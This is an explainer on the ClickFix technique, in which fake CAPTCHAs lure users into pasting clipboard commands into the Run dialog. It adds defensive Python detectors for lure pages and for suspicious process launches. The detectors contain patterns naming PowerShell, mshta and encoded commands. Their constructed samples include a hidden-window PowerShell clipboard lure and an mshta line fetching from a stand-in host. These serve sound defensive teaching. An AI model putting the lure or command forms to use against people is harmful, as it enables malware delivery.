What is ClickFix?
ClickFix is a social engineering technique where fake error messages or CAPTCHAs instruct users to paste attacker-supplied commands into their system's Run dialog or terminal, bypassing traditional email and web security filters.
What it is
ClickFix is a social engineering technique that tricks users into manually executing malicious commands on their own machines. Rather than delivering malware through a file attachment or exploit kit, the attacker presents a fake error message, CAPTCHA verification, or troubleshooting dialog that instructs the user to open the Windows Run dialog (Win+R) or a terminal and paste the clipboard's contents, which the attacker has silently populated using JavaScript.
The technique gained prominence in 2024 and has since appeared across multiple threat actor campaigns, from commodity malware delivery to state-sponsored operations. ClickFix is closely related to phishing in its reliance on deception, but it shifts the execution burden entirely onto the victim.
How a ClickFix attack works
A typical attack chain:
- The victim lands on a malicious or compromised webpage, often through a phishing link, malvertising redirect, or SEO poisoning
- The page displays a convincing overlay (a fake Google reCAPTCHA, a browser update prompt, or an error message stating "Verification required" or "Fix this issue")
- JavaScript on the page silently copies a malicious command to the clipboard using the Clipboard API (navigator.clipboard.writeText())
- The instructions tell the user to press Win+R (opening the Run dialog), then Ctrl+V and Enter
- The pasted command, typically a PowerShell one-liner or mshta invocation, downloads and executes a payload
The user action chain is critical. The victim believes they are completing a routine verification step. The commands are often obfuscated or shortened so they look like a harmless verification code rather than executable instructions.
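The clipboard-population step is the part of this chain a web filter or URL sandbox can actually see. The following is an added example, not code from the original article: a heuristic scan of a captured page's HTML that flags a clipboard write paired with Run-dialog instructions or shell-execution keywords. The two sample pages, the pattern lists and the scoring rule are this example's own constructions.

```python
"""Added example, not code from the original article: a heuristic scan of a
captured page for the clipboard-population step described above. It flags a
page that writes to the clipboard and also carries Run-dialog instructions or
shell-execution keywords. Sample pages below are constructed."""
import re
from dataclasses import dataclass, field

# Ways a page script can place text on the clipboard.
CLIPBOARD_WRITE = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|document\.execCommand\s*\(\s*['\"]copy['\"]",
    re.IGNORECASE,
)
# Terms a legitimate CAPTCHA or error page has no reason to contain.
SHELL_TERMS = re.compile(
    r"powershell|pwsh|mshta|\bcmd(?:\.exe)?\b|-enc(?:odedcommand)?\b|\biex\b"
    r"|invoke-expression|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)
# Lure text steering the victim to Win+R / Ctrl+V / Enter.
RUN_DIALOG_TERMS = re.compile(
    r"win(?:dows)?(?:\s*key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b|run\s+dialog",
    re.IGNORECASE,
)


@dataclass
class Verdict:
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A clipboard write alone is normal ("copy link" buttons); it becomes
        # suspicious when paired with shell terms or Run-dialog instructions.
        return "clipboard write" in self.reasons and len(self.reasons) >= 2


def scan_page(html: str) -> Verdict:
    """Return the signals found in one page's HTML (scripts included)."""
    verdict = Verdict()
    if CLIPBOARD_WRITE.search(html):
        verdict.reasons.append("clipboard write")
    if SHELL_TERMS.search(html):
        verdict.reasons.append("shell execution terms")
    if RUN_DIALOG_TERMS.search(html):
        verdict.reasons.append("Run-dialog paste instructions")
    return verdict


# Constructed sample: an ordinary "copy link" button, which must not alert.
BENIGN_PAGE = """
<p>Share this page</p>
<button onclick="navigator.clipboard.writeText('https://example.invalid/docs')">Copy link</button>
"""

# Constructed sample of a ClickFix-style overlay; the one-liner is a placeholder.
LURE_PAGE = """
<div class="overlay">
  <p>Verification required</p>
  <p>1. Press Win + R   2. Press Ctrl + V   3. Press Enter</p>
</div>
<script>
  // PLACEHOLDER stands in for the attacker-supplied command
  navigator.clipboard.writeText("powershell -w hidden PLACEHOLDER");
</script>
"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("lure", LURE_PAGE)):
        v = scan_page(page)
        print(f"{name}: suspicious={v.suspicious} reasons={v.reasons}")
```

The rule deliberately requires the clipboard write plus a second signal: clipboard writes are common on legitimate pages, while "press Win+R" instructions next to one are not. Scripts loaded from external files would need to be fetched and concatenated into the scanned text first.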
Why it evades traditional security
ClickFix is effective because the malicious execution happens entirely through user action on the local machine. Email security gateways scan attachments and URLs but cannot prevent a user from pasting a command into a system dialog. Web content filters may block the initial landing page, but they do not control the clipboard or local execution environment.
Sandboxing and browser isolation also have limited visibility here. The payload is not downloaded through the browser; instead, the user manually invokes a system-level command that reaches out to attacker infrastructure from outside the browser context.
Delivery mechanisms
- Phishing emails linking to fake document viewers or collaboration portals
- Compromised legitimate websites injected with ClickFix overlay scripts
- Malvertising through ad networks that redirect to ClickFix landing pages
- Fake software update pages impersonating Chrome, Windows Defender, or enterprise tools
The landing pages frequently rely on lookalike domains and typosquatting to host convincing impersonations of well-known services. Attackers register domains that closely mimic legitimate update portals or verification pages, leveraging brand impersonation to build trust before presenting the fake verification step.
Detection and prevention
- Endpoint detection. Monitor for processes spawned by cmd.exe or powershell.exe immediately after Win+R usage, especially with encoded commands or network-fetching behaviors
- Clipboard monitoring policies. Some endpoint protection platforms can alert on clipboard content containing PowerShell or script execution patterns
- User awareness training. Teach users that legitimate CAPTCHAs and error messages never ask them to open a Run dialog or paste commands
- Web filtering. Block known ClickFix infrastructure and detect the JavaScript patterns used to populate the clipboard
- PowerShell execution policies. Constrained language mode or application allowlisting can limit what pasted commands can accomplish
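The endpoint detection bullet above can be turned into a concrete triage rule. The following is an added example, not the article's or any vendor's code: it scores process-creation events for a command interpreter launched by explorer.exe (the parent of anything run via Win+R) together with the command-line traits named above. The event records are constructed, Sysmon-style dictionaries; the field names, indicator list and alert threshold are this example's own conventions.

```python
"""Added example, not the article's own code: triaging Windows process-creation
events for the ClickFix indicators listed above. Events are constructed,
Sysmon-style records; the field names are this example's convention."""
import ntpath
import re
from dataclasses import dataclass, field

# Interpreters a command pasted into the Run dialog typically ends up in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# A command launched via Win+R is spawned by the shell, i.e. explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"

# Command-line indicators; each pattern contributes at most one hit.
INDICATORS = [
    ("encoded command", re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("remote fetch", re.compile(
        r"https?://|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|downloadstring", re.I)),
    ("inline evaluation", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("mshta launch", re.compile(r"\bmshta(?:\.exe)?\b", re.I)),
    # Trailing text that makes the pasted command look like a verification code.
    ("verification bait", re.compile(r"not a robot|verification|captcha", re.I)),
]


@dataclass
class Finding:
    event_id: str
    hits: list[str] = field(default_factory=list)

    @property
    def alert(self) -> bool:
        # One hit alone is too noisy: a user opening PowerShell from the Start
        # menu is also explorer.exe-parented. Require two independent signals.
        return len(self.hits) >= 2


def triage(event: dict) -> Finding:
    """Score one process-creation event for ClickFix-style execution."""
    finding = Finding(event["id"])
    image = ntpath.basename(event["image"]).lower()
    if image not in INTERPRETERS:
        return finding
    if ntpath.basename(event["parent_image"]).lower() == RUN_DIALOG_PARENT:
        finding.hits.append("spawned by explorer.exe (Run dialog)")
    for name, pattern in INDICATORS:
        if pattern.search(event["command_line"]):
            finding.hits.append(name)
    return finding


def alerts(events: list[dict]) -> list[Finding]:
    """Return only the findings that cross the alert threshold."""
    return [f for f in map(triage, events) if f.alert]


# Constructed sample events; hostnames use the reserved .invalid TLD and the
# encoded payload is a placeholder, so nothing here is a working command.
SAMPLE_EVENTS = [
    {"id": "E1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -w hidden -enc PLACEHOLDER_BASE64 # I am not a robot - verification"},
    {"id": "E2", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe"},  # user opened a shell from the Start menu
    {"id": "E3", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"id": "E4", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta http://lure.invalid/PLACEHOLDER.hta"},
    {"id": "E5", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in alerts(SAMPLE_EVENTS):
        print(finding.event_id, "ALERT:", ", ".join(finding.hits))
```

Run over the samples, only E1 and E4 alert: E2 is an interactive shell with no suspicious arguments, E3 is a scheduled script with a non-shell parent, and E5 is not an interpreter at all. In production the same logic would consume real process-creation telemetry, and the explorer.exe-parent signal is the one that most directly encodes the Win+R step the article describes.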